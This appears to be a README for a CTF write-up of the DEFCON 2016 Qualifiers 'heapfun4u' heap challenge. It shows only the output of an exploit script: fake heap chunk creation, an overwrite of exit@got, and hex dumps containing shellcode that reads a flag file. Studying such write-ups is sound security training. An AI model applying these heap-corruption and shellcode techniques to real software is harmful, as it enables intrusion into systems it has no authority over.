# DEFCON CTF Qualifiers 2016 -- heapfun4u Exploit Write-Up

The [write-up is the exploit](#file-exploit-py).

## Example Output

```
[*] './heapfun4u'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE
[x] Starting program './heapfun4u'
[+] Starting program './heapfun4u': Done
[*] Allocated 4064 bytes (index: 1)
[*] Freeing buffer 1
[*] Allocated 16 bytes (index: 2)
[*] Allocated 16 bytes (index: 3)
[*] Allocated 16 bytes (index: 4)
[*] Freeing buffer 3
[*] Heap layout:
    heap[1]: 0x2aaaaaad5008 [4064 bytes]
    heap[2]: 0x2aaaaaad5008 [16 bytes]
    heap[3]: 0x2aaaaaad5020 [16 bytes]
    heap[4]: 0x2aaaaaad5038 [16 bytes]
[*] Fake heap chunks created
    Chunk @ 0x2aaaaaad5018
        Size: 0x10
        List: 0x2aaaaaad5020
        Prev: 0x0
        Next: 0x2aaaaaad5030
    Chunk @ 0x2aaaaaad5030
        Size: 0x20
        List: 0x2aaaaaad5048
        Prev: 0x2aaaaaad5018
        Next: 0x2aaaaaad5058
    Chunk @ 0x2aaaaaad5058
        Size: -0x2aaaaa4d2ff8
        List: 0x602058
        Prev: 0x2aaaaaad5030
        Next: 0x0
[*] Overwriting exit@got: 0x602060
[*] Writing data to buffer 1
[*] 2aaaaaad5008  61 61 61 61 62 61 61 61  63 61 61 61 64 61 61 61  │aaaa│baaa│caaa│daaa│
    2aaaaaad5018  12 00 00 00 00 00 00 00  30 50 ad aa aa 2a 00 00  │····│····│0P··│·*··│
    2aaaaaad5028  00 00 00 00 00 00 00 00  22 00 00 00 00 00 00 00  │····│····│"···│····│
    2aaaaaad5038  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  │····│····│····│····│
    2aaaaaad5048  58 50 ad aa aa 2a 00 00  18 50 ad aa aa 2a 00 00  │XP··│·*··│·P··│·*··│
    2aaaaaad5058  0a d0 b2 55 55 d5 ff ff  00 00 00 00 00 00 00 00  │···U│U···│····│····│
    2aaaaaad5068  30 50 ad aa aa 2a 00 00                           │0P··│·*··││
    2aaaaaad5070
[*] Allocated 32 bytes (index: 5)
[*] Writing data to buffer 1
[*] 2aaaaaad5008  61 61 61 61 62 61 61 61  63 61 61 61 64 61 61 61  │aaaa│baaa│caaa│daaa│
    2aaaaaad5018  68 66 6c 61 67 6a 02 58  48 89 e7 31 f6 99 0f 05  │hfla│gj·X│H··1│····│
    2aaaaaad5028  41 ba ff ff ff 7f 48 89  c6 6a 28 58 6a 01 5f 99  │A···│··H·│·j(X│j·_·│
    2aaaaaad5038  0f 05 6a 3c 58 0f 05                              │··j<│X··│
    2aaaaaad503f
[x] Recieving all data
[x] Recieving all data: 0B
[*] Program './heapfun4u' stopped with exit code 1
[x] Recieving all data: 16B
[+] Recieving all data: Done (16B)
[+] THIS_IS_THE_FLAG
```